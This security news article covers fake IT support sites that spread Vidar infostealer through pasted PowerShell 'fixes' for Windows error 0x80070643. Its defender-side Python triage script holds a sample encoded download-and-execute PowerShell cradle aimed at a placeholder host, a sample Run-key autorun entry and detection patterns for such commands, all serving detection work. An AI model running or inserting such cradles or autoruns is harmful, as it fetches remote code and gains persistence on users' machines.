Malware
July 1, 2024

Fake IT Support Sites Deploy Malicious PowerShell Scripts as Windows Fixes

Fake IT support websites are exploiting common Windows errors, like the 0x80070643 error, by promoting malicious PowerShell "fixes" designed to infect devices with information-stealing malware. This threat was first identified by eSentire's Threat Response Unit (TRU).

The Scheme

Cyber criminals have been creating fake support sites, which are then promoted via compromised YouTube channels to lend credibility to the fraudulent content. These actors focus heavily on the 0x80070643 error, a problem affecting many Windows users since January 2024, following a Microsoft Patch Tuesday update aimed at fixing a BitLocker encryption bypass flaw (CVE-2024-20666).

After installing this update, users worldwide encountered the '0x80070643 - ERROR_INSTALL_FAILURE' message, which persists despite repeated attempts to resolve it. The error text is misleading: the update actually fails because the Windows Recovery Environment (WinRE) partition has insufficient free space, and that partition must be manually expanded to accommodate the update, a task most users find complex.

Exploiting User Frustration

Frustrated users seeking solutions online have become prime targets for these cyber threats. eSentire's TRU discovered that threat actors were creating numerous fake IT support sites, specifically designed to address common Windows errors like 0x80070643. These sites offer supposed fixes that typically involve running a PowerShell script or importing a Windows Registry file, both of which ultimately download and execute malware.

Detailed Attack Process

eSentire's report details how these fake support sites operate. For example, the PCHelperWizard sites instruct users to copy a PowerShell script into the Windows Clipboard and run it. This script contains a Base64 encoded payload that connects to a remote server to download and install Vidar, an information-stealing malware. The process concludes with a fake success message, prompting users to restart their computer, which then activates the malware.

Similarly, the FixedGuides site uses an obfuscated Windows Registry file to hide autorun entries that launch a malicious PowerShell script. This script downloads and installs malware, which subsequently extracts sensitive information such as saved credentials, credit card details, browser cookies, and browsing history.
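As an added, defender-side example (not code from eSentire's report or from this post), the following Python script shows how an analyst would triage the two delivery patterns described above from process-creation and registry telemetry: it decodes a Base64 -EncodedCommand argument (PowerShell encodes the script as UTF-16LE before Base64) and scores the traits the pasted "fix" and the registry autorun share, namely an encoded command, a download cradle, in-memory execution, a hidden window, an execution-policy bypass, and an autorun entry pointing at a script in a user-writable folder. The three sample events, the `example.invalid` hostname, the file names and the indicator names are constructed for this example and are not indicators from the report.

```python
import base64
import re
from typing import Dict, List, Optional, Tuple

# -EncodedCommand and its common abbreviations (-e, -ec, -enc). PowerShell accepts any
# unambiguous prefix, so this regex is an assumption that covers the usual spellings.
ENCODED_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)

# Traits that, seen together, match the "paste this fix" chain described above.
INDICATORS: Dict[str, re.Pattern] = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|Start-BitsTransfer",
        re.IGNORECASE),
    "in_memory_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "policy_bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+(?:bypass|unrestricted)", re.IGNORECASE),
    "run_key_write": re.compile(r"CurrentVersion\\Run(?:Once)?\b", re.IGNORECASE),
    "script_in_user_writable_dir": re.compile(
        r"\\(?:Users\\Public|AppData|ProgramData|Temp)\\[^\s\"']+\.ps1", re.IGNORECASE),
}

# Constructed sample payload: the classic download-and-run cradle with a placeholder host.
INNER_DOWNLOADER = "IEX (New-Object Net.WebClient).DownloadString('https://fix.example.invalid/a.ps1')"
ENCODED = base64.b64encode(INNER_DOWNLOADER.encode("utf-16-le")).decode("ascii")

# Constructed telemetry: (event id, text). Process events carry the command line; the
# registry event carries "value path = data" as an EDR would log a Run-key write.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    ("proc-4412", f"powershell.exe -nop -w hidden -ep bypass -EncodedCommand {ENCODED}"),
    ("reg-5120", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WinFix = "
                 "powershell.exe -WindowStyle Hidden -File C:\\Users\\Public\\fix.ps1"),
    ("proc-6001", "powershell.exe Get-HotFix -Id KB5034441"),   # benign admin check
]


def decode_encoded_command(text: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if absent or malformed."""
    m = ENCODED_FLAG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError subclass
        return None


def analyze(text: str) -> dict:
    """Score one event: indicators are matched on the raw text plus any decoded script."""
    decoded = decode_encoded_command(text)
    haystack = text if decoded is None else text + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    if decoded is not None:
        hits.append("encoded_command")
    # Thresholds are an assumption for this example: one trait alone is common admin noise,
    # two is worth a look, three or more is the stacked pattern these fake fixes use.
    if len(hits) >= 3:
        severity = "high"
    elif len(hits) == 2:
        severity = "medium"
    elif hits:
        severity = "low"
    else:
        severity = "none"
    return {"indicators": sorted(hits), "decoded": decoded, "severity": severity}


def run_all(events: List[Tuple[str, str]] = SAMPLE_EVENTS) -> Dict[str, dict]:
    return {event_id: analyze(text) for event_id, text in events}


if __name__ == "__main__":
    for event_id, result in run_all().items():
        print(f"{event_id}: {result['severity']:6} {', '.join(result['indicators']) or '-'}")
        if result["decoded"]:
            print(f"    decoded: {result['decoded']}")
```

Feeding real Sysmon Event ID 1 command lines and Event ID 13 registry writes into `run_all` gives the same scoring; the decoded script is the part worth keeping in the alert, since it shows the remote host the "fix" actually contacts.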

Consequences and Recommendations

Once the malware is active, it compiles stolen data into an archive (a "log") and uploads it to the attackers' servers. This data can be used for further attacks or sold on dark web marketplaces, leaving victims with compromised accounts and financial fraud risks.

To avoid such threats, it is crucial to download software and fixes only from trusted websites, avoiding random videos and websites with dubious reputations. Users are advised to remain vigilant against unconventional attack methods and protect their credentials, which have become highly valuable commodities for cyber criminals.

For those experiencing the 0x80070643 error, it is recommended to use Microsoft's Show or Hide Tool to hide the problematic update (KB5034441), rather than seeking unverified fixes online.

By following these guidelines, users can protect themselves from falling victim to these sophisticated cyber-attacks.
